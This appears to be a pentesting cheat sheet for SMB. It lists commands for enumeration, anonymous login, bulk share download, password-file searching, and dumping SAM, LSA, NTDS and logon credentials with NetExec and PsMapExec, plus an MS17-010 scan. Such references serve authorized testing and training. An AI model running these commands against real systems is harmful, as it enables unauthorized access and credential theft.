# 139, 445 - SMB

### Enumeration <a href="#enumeration" id="enumeration"></a>

* Identifique o SMB em execução em um host. Liste apenas as portas abertas.

```bash
sudo nmap -sT -sU -sV -p135,137,138,139,445 --open <IP>
```

### Nmap Scripts <a href="#nmap-scripts" id="nmap-scripts"></a>

```bash
# Enumerate shares
nmap --script smb-enum-shares -p 445 <IP>
# OS Discovery
nmap --script smb-os-discovery -p 445 <IP>
# Enumerate Users
nmap --script=smb-enum-users -p 445 <IP>
# All
nmap --script=smb-enum-users,smb-enum-shares,smb-os-discovery -p 139,445 <IP>
```

### NULL / Anonymous Login <a href="#null-anonymous-login" id="null-anonymous-login"></a>

```bash
# On some configuration omitting '-N' will grant access.
smbclient -U '' -L \\\\<IP> 

smbclient -U '' -N -L \\\\<IP> 
smbclient -U '%' -N -L \\\\<IP>
smbclient -U '%' -N \\\\<IP>\\<Folder>

# Enter a random username with no password and try for anonymous login.
crackmapexec smb <IP> -u 'anonymous' -p ''

crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u '' -p '' --shares
```

### Authenticated <a href="#authenticated" id="authenticated"></a>

```bash
# smbmap, list shares and view permissions
smbmap -H <IP> -u <User> -p <Password>

# Connect to share as user and prompt for password
smbclient -U <User> \\\\<IP>\\<Share>
```

### Download Files <a href="#download-files" id="download-files"></a>

```bash
# Grab everything in a share
smbclient '\\<IP>\<Share>' -N -c 'prompt OFF;recurse ON; mget *'

# Recursive pattern search for candidate files to download
smbmap -H <IP> -u <User> -p <Password> -d <Domain> -R -A "pass*" --depth 20  
smbmap -H <IP> -u <User> -p <Password> -d <Domain> -R -A ".txt|.log|.ps1|.vbs|.zip|.xml"
```

### Tools <a href="#tools" id="tools"></a>

#### Enum4Linux <a href="#enum4linux" id="enum4linux"></a>

```bash
enum4linux -a -u '' -p '' <IP>
```

#### NetExec <a href="#crackmapexec" id="crackmapexec"></a>

* Execução e enumeração de comandos no Linux
* <https://www.netexec.wiki/smb-protocol/enumeration>

```bash
nxc smb <IP> -u <User> -p <Password> --shares
nxc smb <IP> -u <User> -p <Password> --users
nxc smb <IP> -u <User> -p <Password> --users-export output.txt
nxc smb <IP> -u <User> -p <Password> --loggedon-users
nxc smb <IP> -u <User> -p <Password> --pass-pol
nxc smb <IP> -u <User> -p <Password> --rid-brute
nxc smb <IP> -u <User> -p <Password> --sam
nxc smb <IP> -u <User> -p <Password> --lsa
nxc smb <IP> -u <User> -p <Password> --ntds
```

#### PsMapExec <a href="#psmapexec" id="psmapexec"></a>

* Execução e enumeração de comandos no Windows

```bash
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module Disks
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module KerbDump
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module LSA
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module LogonPasswords
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module NTDS
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module SAM
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module Sessoions
```

### User Enumeration <a href="#user-enumeration" id="user-enumeration"></a>

#### Nmap <a href="#nmap" id="nmap"></a>

```bash
# Nmap
nmap --script=smb-enum-users -p 445 <IP>

# Metasploit
use auxiliary/scanner/smb/smb_enumusers

# Crackmapexec
crackmapexec smb 10.10.82.202 -u '' -p '' --users --rid-brute | grep '(SidTypeUser)'

# Enum4Linux
enum4linux -u '' -p '' -r <IP> | grep "Local User"
enum4linux -u '' -p ''-r <IP> | grep "Local Group"
```

### Exploits <a href="#exploits" id="exploits"></a>

```bash
nmap --script smb-vuln-ms17-010 -p 445 <IP>
```

#### &#x20;<a href="#samba" id="samba"></a>

<br>